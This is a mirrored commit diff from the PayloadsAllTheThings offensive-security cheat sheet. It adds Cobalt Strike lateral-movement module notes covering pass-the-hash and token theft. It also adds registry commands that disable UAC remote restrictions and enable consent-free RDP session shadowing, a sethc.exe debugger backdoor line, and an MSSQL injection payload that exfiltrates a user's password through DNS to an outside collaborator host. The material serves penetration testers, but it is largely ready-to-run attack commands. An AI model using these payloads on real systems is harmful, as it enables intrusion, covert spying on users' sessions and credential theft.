mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-22 03:08:50 +00:00
Remote Desktop Services Shadowing
This commit is contained in:
parent
4fe1d71ad8
commit
1137bfca8d
@ -313,6 +313,19 @@ beacon > execute-assembly /home/audit/Rubeus.exe
|
|||||||
|
|
||||||
## Lateral Movement
|
## Lateral Movement
|
||||||
|
|
||||||
|
- **portscan:** Performs a portscan on a spesific target.
|
||||||
|
- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user.
|
||||||
|
- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \
|
||||||
|
:exclamation: This module needs Administrator privileges.
|
||||||
|
- **steal_token:** Steal a token from a specified process.
|
||||||
|
- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
|
||||||
|
- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \
|
||||||
|
:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \
|
||||||
|
:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network.
|
||||||
|
- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \
|
||||||
|
:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target.
|
||||||
|
- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts.
|
||||||
|
|
||||||
:warning: All the commands launch powershell.exe
|
:warning: All the commands launch powershell.exe
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -25,6 +25,7 @@
|
|||||||
* [RDP Backdoor](#rdp-backdoor)
|
* [RDP Backdoor](#rdp-backdoor)
|
||||||
* [utilman.exe](#utilman.exe)
|
* [utilman.exe](#utilman.exe)
|
||||||
* [sethc.exe](#sethc.exe)
|
* [sethc.exe](#sethc.exe)
|
||||||
|
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
|
||||||
* [Skeleton Key](#skeleton-key)
|
* [Skeleton Key](#skeleton-key)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
@ -314,6 +315,31 @@ Hit F5 a bunch of times when you are at the RDP login screen.
|
|||||||
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Remote Desktop Services Shadowing
|
||||||
|
|
||||||
|
:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature.
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
* RDP must be running
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4
|
||||||
|
# 4 – View Session without user’s permission.
|
||||||
|
|
||||||
|
# Allowing remote connections to this computer
|
||||||
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||||
|
|
||||||
|
|
||||||
|
# Disable UAC remote restriction
|
||||||
|
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
|
||||||
|
|
||||||
|
mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt
|
||||||
|
# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host;
|
||||||
|
# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowee’s session ID;
|
||||||
|
# /noconsentprompt parameter allows to bypass a shadowee’s permission and shadow their session without their consent;
|
||||||
|
# /prompt parameter is used to specify a user’s credentials to connect to a remote host.
|
||||||
|
```
|
||||||
|
|
||||||
### Skeleton Key
|
### Skeleton Key
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -15,6 +15,8 @@
|
|||||||
* [MSSQL Time Based](#mssql-time-based)
|
* [MSSQL Time Based](#mssql-time-based)
|
||||||
* [MSSQL Stacked query](#mssql-stacked-query)
|
* [MSSQL Stacked query](#mssql-stacked-query)
|
||||||
* [MSSQL Command execution](#mssql-command-execution)
|
* [MSSQL Command execution](#mssql-command-execution)
|
||||||
|
* [MSSQL Out of band](#mssql-out-of-band)
|
||||||
|
* [MSSQL DNS exfiltration](#mssql-dns-exfiltration)
|
||||||
* [MSSQL UNC path](#mssql-unc-path)
|
* [MSSQL UNC path](#mssql-unc-path)
|
||||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||||
* [MSSQL Trusted Links](#mssql-trusted-links)
|
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||||
@ -187,8 +189,18 @@ print(sys.version)
|
|||||||
GO
|
GO
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MSSQL Out of band
|
||||||
|
|
||||||
## MSSQL UNC Path
|
### MSSQL DNS exfiltration
|
||||||
|
|
||||||
|
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### MSSQL UNC Path
|
||||||
|
|
||||||
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user